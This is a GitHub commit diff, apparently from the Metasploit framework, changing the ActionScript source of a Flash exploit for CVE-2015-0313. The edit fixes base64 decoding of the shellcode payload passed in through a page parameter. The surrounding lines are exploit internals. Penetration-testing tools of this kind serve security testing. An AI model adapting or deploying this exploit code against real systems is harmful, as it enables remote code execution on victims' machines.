We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 5c8c5ae commit 23d244bCopy full SHA for 23d244b
data/exploits/CVE-2015-0313/msf.swf
86 Bytes
external/source/exploits/CVE-2015-0313/Main.as
@@ -39,7 +39,10 @@ public class Main extends Sprite
39
40
private function mainThread():void
41
{
42
- b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
+ var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
43
+ var pattern:RegExp = / /g;
44
+ b64_payload = b64_payload.replace(pattern, "+")
45
+ b64.decode(b64_payload)
46
payload = b64.toByteArray().toString()
47
48
ba.length = 0x1000
@@ -204,4 +207,4 @@ public class Main extends Sprite
204
207
return addr + i
205
208
}
206
209
-}
210
+}
0 commit comments